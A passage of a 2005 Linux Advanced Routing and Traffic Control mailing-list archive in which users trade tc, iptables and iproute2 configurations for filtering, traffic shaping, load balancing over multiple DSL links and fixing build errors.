From: lartc@mailman.ds9a.nl (richard lucassen) Date: Tue, 1 Feb 2005 16:11:51 +0100 Subject: [LARTC] combining fw and u32 In-Reply-To: References: <20050201154902.047e4b23.mailinglists@lucassen.org> Message-ID: <20050201161151.34a6f4b7.mailinglists@lucassen.org> On Tue, 1 Feb 2005 16:58:46 +0200 (EET) "Catalin(ux aka Dino) BOIE" wrote: > > Is it possible to create 1 filter rule using fw selectors AND u32 > > selectors? > > http://kernel.umbrella.ro if you don't have 2.6.11-rc1. > If you have the latest iproute2 you can do: > > # send a packet with mark 3 and tcp with dport >= 1024 to 1:50 > tc filter add dev dummy0 \ > protocol ip \ > parent 1: prio 13 \ > u32 \ > match mark 0x0003 0xffff \ > match ip dport 0x0400 0x0400 \ > flowid 1:50 > > See this link for more examples: > http://kernel.umbrella.ro/net/mark_in_u32/examples.txt Ok, thnx, unfortunately it's a 2.4 machine. I just saw it in the changelog of 2.6.11rc1. That's a good thing :-) As this machine will be upgraded in the coming months, I'll put 2.6.11 on it. And which version do you call "new iproute2"? R. -- ___________________________________________________________________ Recursion: see recursion +------------------------------------------------------------------+ | Richard Lucassen, Utrecht | | Public key and email address: | | http://www.lucassen.org/mail-pubkey.html | +------------------------------------------------------------------+ From util@deuroconsult.ro Tue Feb 1 15:18:14 2005 
From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Tue, 1 Feb 2005 17:18:14 +0200 (EET) Subject: [LARTC] combining fw and u32 In-Reply-To: <20050201161151.34a6f4b7.mailinglists@lucassen.org> References: <20050201154902.047e4b23.mailinglists@lucassen.org> <20050201161151.34a6f4b7.mailinglists@lucassen.org> Message-ID: > As this machine will be upgraded in the coming months, I'll put 2.6.11 > on it. And which version do you call "new iproute2"? If you download it _now_, you'll be ok. :) > > R. > > -- > ___________________________________________________________________ > Recursion: see recursion > > +------------------------------------------------------------------+ > | Richard Lucassen, Utrecht | > | Public key and email address: | > | http://www.lucassen.org/mail-pubkey.html | > +------------------------------------------------------------------+ > --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ From lartc@mailman.ds9a.nl Tue Feb 1 16:01:04 2005 
From: lartc@mailman.ds9a.nl (richard lucassen) Date: Tue, 1 Feb 2005 17:01:04 +0100 Subject: [LARTC] combining fw and u32 In-Reply-To: References: <20050201154902.047e4b23.mailinglists@lucassen.org> <20050201161151.34a6f4b7.mailinglists@lucassen.org> Message-ID: <20050201170104.413f2b87.mailinglists@lucassen.org> On Tue, 1 Feb 2005 17:18:14 +0200 (EET) "Catalin(ux aka Dino) BOIE" wrote: > > As this machine will be upgraded in the coming months, I'll put > > 2.6.11 on it. And which version do you call "new iproute2"? > > If you download it _now_, you'll be ok. :) Of course :-) But as I'm lazy I wondered if the Debian Sarge (20041019) was new enough ;-) -- ___________________________________________________________________ Recursion: see recursion +------------------------------------------------------------------+ | Richard Lucassen, Utrecht | | Public key and email address: | | http://www.lucassen.org/mail-pubkey.html | +------------------------------------------------------------------+ From sfs_lartc@suder.dk Tue Feb 1 21:05:57 2005 
From: sfs_lartc@suder.dk (Steen Suder) Date: Tue, 1 Feb 2005 22:05:57 +0100 Subject: [LARTC] Sessionbased traffic on NANO? Message-ID: <200502012205.57753.sfs_lartc@suder.dk>
I use the well-known nano setup (by Christoph Simon) on a few sites with success.

From time to time a user approaches me with problems that seem to originate from the fact that only traffic to the same DST IP on the net will get out the same link.

The problem happens with traffic from applications that contact different IPs in the "same session".

An example is Anarchy Online, where the client contacts a new IP during game login and, hence, this traffic gets out over a new link. In that second the game client's connection to the servers is lost.

There exist other examples, but it's always the same issue.

I know that this issue has been brought up on several occasions, but I have found no solutions to this "simple" issue.

Does anyone have suggestions on how to handle this, besides "nailing" the traffic to a specific uplink, based on DST PORT?

--
Mvh. / Best regards,
Steen Suder
From nug@sch.bme.hu Tue Feb 1 21:49:22 2005
From: nug@sch.bme.hu (=?ISO-8859-1?Q?T=F3th_N=E1ndor?=) Date: Tue, 01 Feb 2005 22:49:22 +0100 Subject: [LARTC] Sessionbased traffic on NANO? In-Reply-To: <200502012205.57753.sfs_lartc@suder.dk> References: <200502012205.57753.sfs_lartc@suder.dk> Message-ID: <41FFF962.2060803@sch.bme.hu> Hi! Steen Suder wrote: > I use the wellknown nano setup (by Christoph Simon) on a few sites with > success. > > From time to time a user approaches me with problems that seems to > originate from the fact that only trafic to the samt DST IP on the net > will get out the same link. > > The problem happens with traffic from applications that contact > different IPs in the "same session". > > An example is Anarchy Online, where the the client contacts a new IP > during game login and, hence, this traffic gets out over a new link. In > that second the game clients connection to the servers are lost. > > There exist other examples, but it's always the same issue. > > I know that this issue has been brought up on several occasions, but I > have found no solutions to this "simple" issue. > > Does anyone have suggestions on how to handle this, besides "nailing" > the traffic to a specific uplink, based on DST PORT? ,,Nail'' the traffic of the specific user's computer using routing based on his/her source ip address (policy routing). For icq, see my previos post. I think there is no generally useful solution. BTW. There are games that let only one player from a private (nat-ed) network. -- Udv, Nandor From nistnet_user@yahoo.com Wed Feb 2 01:29:02 2005 
From: nistnet_user@yahoo.com (js si) Date: Tue, 1 Feb 2005 17:29:02 -0800 (PST) Subject: [LARTC] cross compiling iproute2 Message-ID: <20050202012902.52481.qmail@web41510.mail.yahoo.com> i have to cross compile iproute2 for power pc. i am completely new to cross compiling and would appreciate any help. thanks. From ViktorHorvath@gmx.net Wed Feb 2 03:46:04 2005 
From: ViktorHorvath@gmx.net (Viktor Horvath) Date: Wed, 02 Feb 2005 04:46:04 +0100 Subject: [LARTC] can't understand strange PRIO behaviour Message-ID: <1107315964.718.20.camel@Charon>
Hello everybody,

sorry for bothering you, but after some hours, I'm stuck. I'm living in a student's foundation where I want to connect lots of people to a tiny DSL link. We have exactly four types of traffic. We want a really hard PRIO solution (as I promised to someone that group X will only use the link capacity which isn't used by group Y). I could make a PRIO with four classes, but as I want to separate first by MAC address in two groups and separate each group another time afterwards, I decided to put two PRIOs after the main one:

               PRIO 1:
              /       \
             /         \
       PRIO 10:       PRIO 20:
        /    \         /    \
       /      \       /      \
SFQ 110:  SFQ 120:  SFQ 210:  SFQ 220:

My problem now is, that my filters don't work. In fact, I wrote only one, and all packages get elsewhere, but not in the flow I commanded. Strangely, tc says that my rule is successfully matched. Here are the proofs, my rule filters to flowid 10:2, but everything goes to 20:1. Have I made an error? Am I missing some kernel feature? My versions: Kernel 2.6.10 and newest iproute from Debian unstable (20041019-2).

Thank you for reading,
Viktor.

--------> CONFIGURATION SCRIPT <--------

# Create the main PRIO qdisc
tc qdisc add dev ppp0 root handle 1: prio bands 2 priomap 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
# Create the two PRIO sub-qdiscs
tc qdisc add dev ppp0 parent 1:1 handle 10: prio bands 2 priomap 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
tc qdisc add dev ppp0 parent 1:2 handle 20: prio bands 2 priomap 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
# Create the four subclasses
tc qdisc add dev ppp0 parent 10:1 handle 110: sfq
tc qdisc add dev ppp0 parent 10:2 handle 120: sfq
tc qdisc add dev ppp0 parent 20:1 handle 210: sfq
tc qdisc add dev ppp0 parent 20:2 handle 220: sfq
# Filters for classifying
# catch-all
tc filter add dev ppp0 protocol ip parent 1: prio 2 u32 match ip src 0.0.0.0/0 flowid 10:2

--------> OUTPUT "tc -s qdisc show dev ppp0" <--------

qdisc prio 1: bands 2 priomap 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
 Sent 5321336 bytes 9407 pkts (dropped 0, overlimits 0)
qdisc prio 10: parent 1:1 bands 2 priomap 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
 Sent 2160 bytes 2 pkts (dropped 0, overlimits 0)
qdisc prio 20: parent 1:2 bands 2 priomap 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
 Sent 5319176 bytes 9405 pkts (dropped 0, overlimits 0)
qdisc sfq 110: parent 10:1 limit 128p quantum 1452b
 Sent 0 bytes 0 pkts (dropped 0, overlimits 0)
qdisc sfq 120: parent 10:2 limit 128p quantum 1452b
 Sent 0 bytes 0 pkts (dropped 0, overlimits 0)
qdisc sfq 210: parent 20:1 limit 128p quantum 1452b
 Sent 5319176 bytes 9405 pkts (dropped 0, overlimits 0)
qdisc sfq 220: parent 20:2 limit 128p quantum 1452b
 Sent 0 bytes 0 pkts (dropped 0, overlimits 0)

--------> OUTPUT "tc -s filter show dev ppp0" (bit later) <--------

filter parent 1: protocol ip pref 2 u32
filter parent 1: protocol ip pref 2 u32 fh 800: ht divisor 1
filter parent 1: protocol ip pref 2 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid 10:2 (rule hit 13430 success 13430)
  match 00000000/00000000 at 12 (success 13430 )
From jasonb@edseek.com Wed Feb 2 03:16:42 2005
From: jasonb@edseek.com (Jason Boxman) Date: Tue, 1 Feb 2005 22:16:42 -0500 Subject: [LARTC] can't understand strange PRIO behaviour In-Reply-To: <1107315964.718.20.camel@Charon> References: <1107315964.718.20.camel@Charon> Message-ID: <200502012216.42839.jasonb@edseek.com> On Tuesday 01 February 2005 22:46, Viktor Horvath wrote: > Hello everybody, > > sorry for bothering you, but after some hours, I'm stuck. I'm living in > a student's foundation where I want to connect lots of people to a tiny > DSL link. We have exactly four types of traffic. We want a really hard > PRIO solution (as I promised to someone that group X will only use the > link capacity which isn't used by group Y). I could make a PRIO with > four classes, but as I want to separate first by MAC address in two > groups and separate each group another time afterwards, I decided to put > two PRIOs after the main one: Could you perhaps replace your root prio with a classful tbf from recent kernel? > My problem now is, that my filters don't work. In fact, I wrote only > one, and all packages get elsewhere, but not in the flow I commanded. > Strangely, tc says that my rule is successfully matched. Here are the > proofs, my rule filters to flowid 10:2, but everything goes to 20:1. > Have I made an error? Am I missing some kernel feature? My versions: > Kernel 2.6.10 and newest iproute from Debian unstable (20041019-2). Strange. -- Jason Boxman Perl Programmer / *NIX Systems Administrator Shimberg Center for Affordable Housing | University of Florida http://edseek.com/ - Linux and FOSS stuff From Andreas.Klauer@metamorpher.de Wed Feb 2 03:50:43 2005 
From: Andreas.Klauer@metamorpher.de (Andreas Klauer) Date: Wed, 2 Feb 2005 04:50:43 +0100 Subject: [LARTC] can't understand strange PRIO behaviour In-Reply-To: <1107315964.718.20.camel@Charon> References: <1107315964.718.20.camel@Charon> Message-ID: <200502020450.43552.Andreas.Klauer@metamorpher.de> On Wednesday 02 February 2005 04:46, Viktor Horvath wrote: > tc qdisc add dev ppp0 root handle 1: prio bands 2 priomap 0 0 0 0 0 0 0 > 0 0 0 0 0 0 0 0 0 > # Create the two PRIO sub-qdiscs > tc qdisc add dev ppp0 parent 1:1 handle 10: prio bands 2 priomap 0 0 0 0 > 0 0 0 0 0 0 0 0 0 0 0 0 > tc qdisc add dev ppp0 parent 1:2 handle 20: prio bands 2 priomap 0 0 0 0 > 0 0 0 0 0 0 0 0 0 0 0 0 [...] > # catch-all > tc filter add dev ppp0 protocol ip parent 1: prio 2 u32 match ip src > 0.0.0.0/0 flowid 10:2 I don't know if it is a bug or whatever, but PRIO doesn't like alien filters. You may only put traffic into a class of the qdisc you attached the filter to. At least this is how it works on my machine (2.4 kernel). So using these filter rules should work as expected: tc filter add dev ppp0 protocol ip parent 1: prio 2 u32 match ip src 0.0.0.0/0 flowid 1:1 tc filter add dev ppp0 protocol ip parent 10: prio 2 u32 match ip src 0.0.0.0/0 flowid 10:2 HTH Andreas From Denis Kot Wed Feb 2 08:37:04 2005 From: Denis Kot (Denis Kot) Date: Wed, 2 Feb 2005 10:37:04 +0200 Subject: [LARTC] Fwd: why there is any traffic in default class? In-Reply-To: <3cfad9ca05013101435f72a4d9@mail.gmail.com> References: <3cfad9ca05013101435f72a4d9@mail.gmail.com> Message-ID: <3cfad9ca050202003741ff9ed9@mail.gmail.com> no one know? ---------- Forwarded message ---------- 
From: Denis Kot Date: Mon, 31 Jan 2005 11:43:36 +0200 Subject: why there is any traffic in default class? To: lartc@mailman.ds9a.nl
I have:

tc qdisc add dev imq0 root handle 1: htb default 30
tc class add dev imq0 parent 1: classid 1:1 htb rate 512kbit ceil 512kbit
tc class add dev imq0 parent 1:1 classid 1:30 htb rate 64kbit ceil 512kbit

then:

iptables -t mangle -A PREROUTING -i ppp0 -s 192.168.2.2 -j IMQ --todev 0
tc class add dev imq0 parent 1:1 classid 1:22 htb rate 64kbit ceil 128kbit
tc filter add dev imq0 protocol ip parent 1:0 prio 1 u32 match ip src 192.168.2.2 flowid 1:22

so, as I understand any traffic from source 192.168.2.2 AND from interface ppp0 must be going directly in to class 1:22, and default class 30 must not have any traffic. isn´t it?

--
Denis Kot
denis?jabber.org.by
ICQ: 13680126
Mobil: +375 29 6-1234-78
From util@deuroconsult.ro Wed Feb 2 11:07:24 2005
From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Wed, 2 Feb 2005 13:07:24 +0200 (EET) Subject: [LARTC] combining fw and u32 In-Reply-To: <20050201170104.413f2b87.mailinglists@lucassen.org> References: <20050201154902.047e4b23.mailinglists@lucassen.org> <20050201161151.34a6f4b7.mailinglists@lucassen.org> <20050201170104.413f2b87.mailinglists@lucassen.org> Message-ID:
On Tue, 1 Feb 2005, richard lucassen wrote:
> On Tue, 1 Feb 2005 17:18:14 +0200 (EET)
> "Catalin(ux aka Dino) BOIE" wrote:
>
>>> As this machine will be upgraded in the coming months, I'll put
>>> 2.6.11 on it. And which version do you call "new iproute2"?
>>
>> If you download it _now_, you'll be ok. :)
>
> Of course :-) But as I'm lazy I wondered if the Debian Sarge (20041019)
> was new enough ;-)
>
>

Nope.

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/
From Adolf Nepolean Raj Wed Feb 2 11:23:03 2005
From: Adolf Nepolean Raj (Adolf Nepolean Raj) Date: Wed, 2 Feb 2005 16:53:03 +0530 Subject: [LARTC] combining fw and u32 In-Reply-To: <20050201154902.047e4b23.mailinglists@lucassen.org> References: <20050201154902.047e4b23.mailinglists@lucassen.org> Message-ID: hai.. I want to know about packer separation. Tell me the links and some source codes. That will be helpful for my project. From ViktorHorvath@gmx.net Wed Feb 2 20:42:06 2005 
From: ViktorHorvath@gmx.net (Viktor Horvath) Date: Wed, 02 Feb 2005 21:42:06 +0100 Subject: [LARTC] can't understand strange PRIO behaviour In-Reply-To: <200502020450.43552.Andreas.Klauer@metamorpher.de> References: <1107315964.718.20.camel@Charon> <200502020450.43552.Andreas.Klauer@metamorpher.de> Message-ID: <1107376926.1549.13.camel@Charon> --=-ibW+9An3RDdi18j3COJs Content-Type: text/plain Content-Transfer-Encoding: quoted-printable On Wed, 2005-02-02 at 04:50 +0100, Andreas Klauer wrote: [...] > I don't know if it is a bug or whatever, but PRIO doesn't like alien=20 > filters. You may only put traffic into a class of the qdisc you attached=20 > the filter to. At least this is how it works on my machine (2.4 kernel). Thanks a lot for this help! It's exactly as you described it, and your rules work fine.=20 On Tue, 2005-02-01 at 22:16 -0500, Jason Boxman wrote: [...]=20 > Could you perhaps replace your root prio with a classful tbf from recent=20 > kernel? It would certainly be better. However, I want a strict hierarchy, so that first PRIO is always served before the second one. Probably I'll have to use CBQ instead of HTB or TBF, as after reading the howto, it seems to me you can only there add priorities for the subclasses. Some little suggestions for the howto: (1) Maybe one could include Andreas' sentence to the PRIO section: "You may only put traffic into a class of the qdisc you attached the filter to." One could add that subclasses are not possible in PRIO (this is quite evident, but some newbies could think of it ;-) (2) The third filter command ("catch-all") in section 9.6.1 # tc filter add dev eth0 protocol ip parent 10: prio 2 flowid 10:2 does not work as it doesn't use a filter. One has to use something like # tc filter add dev eth0 protocol ip parent 10: prio 2 u32 match ip src=20 0.0.0.0/0 flowid 10:2 instead. Thanks a lot! Viktor. P.S. Is there a German translation going on? 
From rmocius@auste.elnet.lt Wed Feb 2 12:25:07 2005
From: rmocius@auste.elnet.lt (Remus) Date: Wed, 2 Feb 2005 12:25:07 -0000 Subject: [LARTC] iproute2 compilation problem References: <1107315964.718.20.camel@Charon> <200502020450.43552.Andreas.Klauer@metamorpher.de> <1107376926.1549.13.camel@Charon> Message-ID: <18dc01c50922$3b467b20$6e69690a@RIMAS> Hi folks, I just tried to compile the latest (current) iproute2 and got these errors: arpd.c:19:20: db_185.h: No such file or directory arpd.c:42: error: parse error before '*' token arpd.c:42: warning: type defaults to `int' in declaration of `dbase' arpd.c:42: warning: data definition has no type or storage class arpd.c: In function `do_one_request': arpd.c:305: error: `DBT' undeclared (first use in this function) arpd.c:305: error: (Each undeclared identifier is reported only once arpd.c:305: error: for each function it appears in.) arpd.c:305: error: parse error before "dbkey" arpd.c:309: error: request for member `sync' in something not a structure or union arpd.c:339: error: `dbkey' undeclared (first use in this function) arpd.c:342: error: request for member `get' in something not a structure or union arpd.c:342: error: `dbdat' undeclared (first use in this function) arpd.c:366: error: request for member `del' in something not a structure or union arpd.c:392: error: request for member `put' in something not a structure or union arpd.c:410: error: request for member `put' in something not a structure or union arpd.c:422: error: request for member `put' in something not a structure or union arpd.c: In function `get_arp_pkt': arpd.c:486: error: `DBT' undeclared (first use in this function) arpd.c:486: error: parse error before "dbkey" arpd.c:517: error: `dbkey' undeclared (first use in this function) arpd.c:520: error: request for member `get' in something not a structure or union arpd.c:520: error: `dbdat' undeclared (first use in this function) arpd.c:530: error: request for member `put' in something not a structure or union arpd.c: In function `main': arpd.c:670: 
warning: implicit declaration of function `dbopen' arpd.c:670: error: `DB_HASH' undeclared (first use in this function) arpd.c:670: warning: assignment makes pointer from integer without a cast arpd.c:680: error: `DBT' undeclared (first use in this function) arpd.c:680: error: parse error before "dbkey" arpd.c:682: error: `dbkey' undeclared (first use in this function) arpd.c:711: error: `dbdat' undeclared (first use in this function) arpd.c:716: error: request for member `put' in something not a structure or union arpd.c:721: error: request for member `sync' in something not a structure or union arpd.c:727: error: parse error before "dbkey" arpd.c:729: error: request for member `seq' in something not a structure or union arpd.c:729: error: `R_NEXT' undeclared (first use in this function) arpd.c:821: error: request for member `sync' in something not a structure or union arpd.c:840: error: request for member `close' in something not a structure or union arpd.c:844: error: request for member `close' in something not a structure or union make[1]: *** [arpd] Error 1 make[1]: Leaving directory `/home/iproute2/new/Source/Orig/iproute2-050124/misc' make: *** [all] Error 2 My kernel 2.6.10 on Slackware 10 (current) Any ideas? Regards Remus From gypsy@iswest.com Wed Feb 2 14:58:41 2005 
From: gypsy@iswest.com (gypsy) Date: Wed, 02 Feb 2005 06:58:41 -0800 Subject: [LARTC] iproute2 compilation problem References: <1107315964.718.20.camel@Charon> <200502020450.43552.Andreas.Klauer@metamorpher.de> <1107376926.1549.13.camel@Charon> <18dc01c50922$3b467b20$6e69690a@RIMAS> Message-ID: <4200EAA1.956B5B83@iswest.com> Remus wrote: > > Hi folks, > > I just tried to compile the latest (current) iproute2 and got these errors: > > arpd.c:19:20: db_185.h: No such file or directory ==SNIP== > make[1]: *** [arpd] Error 1 > make[1]: Leaving directory > `/home/iproute2/new/Source/Orig/iproute2-050124/misc' > make: *** [all] Error 2 > > My kernel 2.6.10 on Slackware 10 (current) > > Any ideas? > > Regards > > Remus Install from slackware/l the db3-3.11-i486-4 db31-3-1-17-i486-1 and db4-4.2.52-i486-2 libraries. gypsy From lists@wildgooses.com Wed Feb 2 15:08:21 2005 
From: lists@wildgooses.com (Ed Wildgoose) Date: Wed, 02 Feb 2005 15:08:21 +0000 Subject: [LARTC] Best way to drop avg packet size? Message-ID: <4200ECE5.6030109@wildgooses.com> I am testing VoIP via SIP on my local network and despite a careful setup to prioritise the voip packets I am still getting some small amounts of breakup when the system is under stress. I already my patches to HTB to get it to understand ADSL bandwidth (so I know that this is being accounted for OK), and also with the HTB code patched to not use "hysterisis". It's also only intermittent and seems to affect outbound traffic more than inbound and so I suspect that it's down to the average packet size being the default 1500 bytes..? Sound plausible? So what is the preferred method of reducing the MTU of connections, outwards in particular, but inbound would also be nice? I am currently experimenting with a rule in the forward chain on the router which does a "--set-mss XXX". Is this better or worse than simply changing the MTU on either the router box of the modem? Anyone got any experience of the problems that can occur here? The router also runs a small public mail and web server and so I don't want to start accidently locking people out, or having connection issues. Thanks Ed W From rmocius@auste.elnet.lt Wed Feb 2 15:11:34 2005 
From: rmocius@auste.elnet.lt (Remus) Date: Wed, 2 Feb 2005 15:11:34 -0000 Subject: [LARTC] iproute2 compilation problem References: <1107315964.718.20.camel@Charon> <200502020450.43552.Andreas.Klauer@metamorpher.de> <1107376926.1549.13.camel@Charon> <18dc01c50922$3b467b20$6e69690a@RIMAS> <4200EAA1.956B5B83@iswest.com> Message-ID: <196501c50939$7be77780$6e69690a@RIMAS> Gypsy, I was missing only db31-3-1-17-i486-1, but after it install I still get the same errors. Regards Remus > Remus wrote: >> >> Hi folks, >> >> I just tried to compile the latest (current) iproute2 and got these >> errors: >> >> arpd.c:19:20: db_185.h: No such file or directory > ==SNIP== >> make[1]: *** [arpd] Error 1 >> make[1]: Leaving directory >> `/home/iproute2/new/Source/Orig/iproute2-050124/misc' >> make: *** [all] Error 2 >> >> My kernel 2.6.10 on Slackware 10 (current) >> >> Any ideas? >> >> Regards >> >> Remus > > Install from slackware/l the db3-3.11-i486-4 db31-3-1-17-i486-1 and > db4-4.2.52-i486-2 libraries. > > gypsy > > From go0ogl3 Wed Feb 2 15:34:05 2005 
From: go0ogl3 (go0ogl3) Date: Wed, 2 Feb 2005 17:34:05 +0200 Subject: [LARTC] iproute2 compilation problem In-Reply-To: <196501c50939$7be77780$6e69690a@RIMAS> References: <1107315964.718.20.camel@Charon> <200502020450.43552.Andreas.Klauer@metamorpher.de> <1107376926.1549.13.camel@Charon> <18dc01c50922$3b467b20$6e69690a@RIMAS> <4200EAA1.956B5B83@iswest.com> <196501c50939$7be77780$6e69690a@RIMAS> Message-ID: On Wed, 2 Feb 2005 15:11:34 -0000, Remus wrote: > Gypsy, > > I was missing only db31-3-1-17-i486-1, but after it install I still > get the same errors. > > Regards > > Remus > > > > Remus wrote: > >> > >> Hi folks, > >> > >> I just tried to compile the latest (current) iproute2 and got these > >> errors: > >> > >> arpd.c:19:20: db_185.h: No such file or directory > > ==SNIP== > >> make[1]: *** [arpd] Error 1 > >> make[1]: Leaving directory > >> `/home/iproute2/new/Source/Orig/iproute2-050124/misc' > >> make: *** [all] Error 2 > >> > >> My kernel 2.6.10 on Slackware 10 (current) > >> > >> Any ideas? > >> > >> Regards > >> > >> Remus > > > > Install from slackware/l the db3-3.11-i486-4 db31-3-1-17-i486-1 and > > db4-4.2.52-i486-2 libraries. > > > > gypsy > > > > > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > Just edit your Makefile where you find a line like this: --- cut here --- # Path to db_185.h include DBM_INCLUDE:=/usr/include --- and here --- with: #Path to db_185.h include DBM_INCLUDE:=/usr/include/db4/db_185.h Compile and you'll be fine :) From Joe Nuts Wed Feb 2 15:42:11 2005 
From: Joe Nuts (Joe Nuts)
Date: Wed, 2 Feb 2005 09:42:11 -0600
Subject: [LARTC] Packet Level Load Balance inbound/outbound success with nth and route
Message-ID:

First of all, I'd like to thank Andy Furniss for his direction and for helping me get a working example up and running.

For the following set up to work, you will need a linux computer at the ISP (server), a linux computer at the client location (client), and some a public range of IP's you plan to send down to your client.

(as this configuration involves patching the linux kernel, I assume you have already downloaded it, and have previously compiled a kernel)

steps to set up the linux computers are:

make sure both computers have forwarding allowed (i do this with a 'net.ipv4.ip_forward = 1' line in my /etc/sysctl.conf)

download iptables source, and patch-o-matic files from netfilter.org

unzip those files. run the patch-o-matic script. when you get to the 'nth' and 'ROUTE' packages, select Y.

then, in the kernel config, under networking options, under netfilter configuration, under iptables support, select nth, and under packet mangling, select ROUTE.

compile the kernel, reboot with new kernel.

compile iptables, make && make install.

even after running make install, on my system, the two iptables libraries didn't make it to /lib/iptables, so i had to copy them manually. (copy libipt_nth.so and libipt_ROUTE.so from the iptables source to /lib/iptables)

now, I use GRE tunnels from the server to the client to send inbound traffic, I assume you can use any kind of tunnel, just make sure support for whatever you want to use is installed in to the kernel.

for the sake of the example, IP's will be defined as follows :

Local IP at client : 66.81.23.1 (eth0)
DSL #1 at client : 64.20.12.46 (eth1) (64.20.12.45 is gateway)
DSL #2 at client : 64.20.12.50 (eth2) (64.20.12.49 is gateway)
Public IP of server : 66.80.22.30
Public IP Range sent to client : 66.81.23.0/24

the tunnels need to be set up on both the client and the server

--server--
ip tunnel add client_tun1 mode gre remote 66.20.12.46 local 66.80.22.30 ttl 255
ip tunnel add client_tun2 mode gre remote 66.20.12.50 local 66.80.22.30 ttl 255
ip link set client_tun1 up
ip link set client_tun2 up
ip addr add 172.16.0.1/30 dev client_tun1
ip addr add 172.16.0.5/30 dev client_tun2

--client--
ip tunnel add client_tun1 mode gre remote 66.80.22.30 local 66.20.12.46 ttl 255
ip tunnel add client_tun2 mode gre remote 66.80.22.30 local 66.20.12.50 ttl 255
ip link set client_tun1 up
ip link set client_tun2 up
ip addr add 172.16.0.2/30 dev client_tun1
ip addr add 172.16.0.6/30 dev client_tun2

traffic outbound from the client doesn't need to go out the tunnel, but it does need to be split

--client--
iptables -A POSTROUTING --source 66.81.23.0/24 -t mangle -m nth --counter 0 --every 2 --packet 0 -j ROUTE --oif eth1 --gw 64.20.12.45
iptables -A POSTROUTING --source 66.81.23.0/24 -t mangle -m nth --counter 0 --every 2 --packet 1 -j ROUTE --oif eth2 --gw 64.20.12.49

traffic inbound to the client will go to the server, and come to client through the tunnel

--server--
iptables -A POSTROUTING --destination 66.81.23.0/24 -t mangle -m nth --counter 0 --every 2 --packet 0 -j ROUTE --oif client_tun1 --gw 172.16.0.2
iptables -A POSTROUTING --destination 66.81.23.0/24 -t mangle -m nth --counter 0 --every 2 --packet 1 -j ROUTE --oif client_tun2 --gw 172.16.0.6

Of course this set up can be used to divide across more than two links, just duplicate / modify the lines as needed.

Computers behind the client can now be given public IP's in that range, set their gateway to 66.81.23.1, and they're up and running on both lines.

I hope this helps someone like me!

Sincerely,
Joe Comeaux

From rmocius@auste.elnet.lt Wed Feb 2 15:57:36 2005
From: rmocius@auste.elnet.lt (Remus)
Date: Wed, 2 Feb 2005 15:57:36 -0000
Subject: [LARTC] iproute2 compilation problem
References: <1107315964.718.20.camel@Charon> <200502020450.43552.Andreas.Klauer@metamorpher.de> <1107376926.1549.13.camel@Charon> <18dc01c50922$3b467b20$6e69690a@RIMAS> <4200EAA1.956B5B83@iswest.com> <196501c50939$7be77780$6e69690a@RIMAS>
Message-ID: <19bc01c5093f$ea712380$6e69690a@RIMAS>

That have worked for me.

Thanks

Remus

> Just edit your Makefile where you find a line like this:
>
> --- cut here ---
> # Path to db_185.h include
> DBM_INCLUDE:=/usr/include
> --- and here ---
>
> with:
>
> #Path to db_185.h include
> DBM_INCLUDE:=/usr/include/db4/db_185.h
>
> Compile and you'll be fine :)

From sanjeev_ravindran@linuxmail.org Wed Feb 2 16:42:52 2005
From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran)
Date: Thu, 03 Feb 2005 00:42:52 +0800
Subject: [LARTC] Issue with using using tc api
Message-ID: <20050202164252.5A5E32B2BD0@ws5-7.us4.outblaze.com>

Hi ,

I'm trying to call the tc_qdisc_modify function of tc in iproute2/tc. I could compile it with my stub program and got the executable. However, when i try to create an htb qdisc i get the following error :

Unknown qdisc "htb", hence option "default" is unparsable

However, if i use the tc tool, it works fine.. When I tried to understand the problem, it appeared to be failing of dlopen to load the module.. But when i use tc tool, it loads this module..

Any help in this regard will be most appreciated..

Thanks in advance,
With best regards,
Sanjeev

From nistnet_user@yahoo.com Wed Feb 2 17:48:02 2005
From: nistnet_user@yahoo.com (js si)
Date: Wed, 2 Feb 2005 09:48:02 -0800 (PST)
Subject: [LARTC] doubts: cross compiling iproute2
Message-ID: <20050202174802.72999.qmail@web41508.mail.yahoo.com>

i tried to cross compile iproute2 on a linux machine using a cross compiler for ppc750. i have some questions:

1) make tries to execute tc/normal, tc/paretonormal, tc/pareto to make distribution files like normal.dist
because i am cross compiling the object files can't be executed. will it suffice if i copy the distribution files from my linux iproute2 compilation to the /usr/lib/tc directory on the ppc?

2)i can't locate db_185.h for the ppc. so i don't specify DBM_INCLUDE in the make file. i get compilation errors in the misc directory. the thing is that i want to only use the tc command from the iproute2 package. is tc independent from whatever is compiled in the misc directory? actually tc worked on the ppc, but i just had a doubt.

thanks.

From gdamjan@mail.net.mk Wed Feb 2 18:28:51 2005
From: gdamjan@mail.net.mk (Damjan)
Date: Wed, 2 Feb 2005 19:28:51 +0100
Subject: [LARTC] How to bond pppoe links
In-Reply-To: <41FF39C4.2070603@draxinusom.ch>
References: <20050131222309.GA31550@legolas.on.net.mk> <41FF39C4.2070603@draxinusom.ch>
Message-ID: <20050202182850.GA5871@legolas.on.net.mk>

> Yes it is possible, though it may make only sense iff you have several
> clients behind the gateway (since for example http is a stateless
> protocol where most often every single picture and page is fetched using
> another tcp connection and if you balance it always, you are constantly
> switching the source ip which breaks ssl and session tracking. Generally
> you always use the same link for the same destination, which means less
> balancing, so you need more clients to even it out again)
>
> But for help, I have found the nano-howto extremely useful.
> http://www.ssi.bg/~ja/nano.txt

I think this will work... I've made some preliminary tests, a simple
multipath default route:
ip route add default proto static nexthop dev ppp0 nexthop dev ppp1
and I saw packets going out from both of the interfaces.

I've also tried to setup MLPPP on the PPPOE links but it seems that the
DSLAM on the other side didn't support this.

--
damjan | дамјан
This is my jabber ID --> damjan@bagra.net.mk <-- not my mail address!!!

From lartc@draxinusom.ch Wed Feb 2 19:21:56 2005
From: lartc@draxinusom.ch (Rene Gallati)
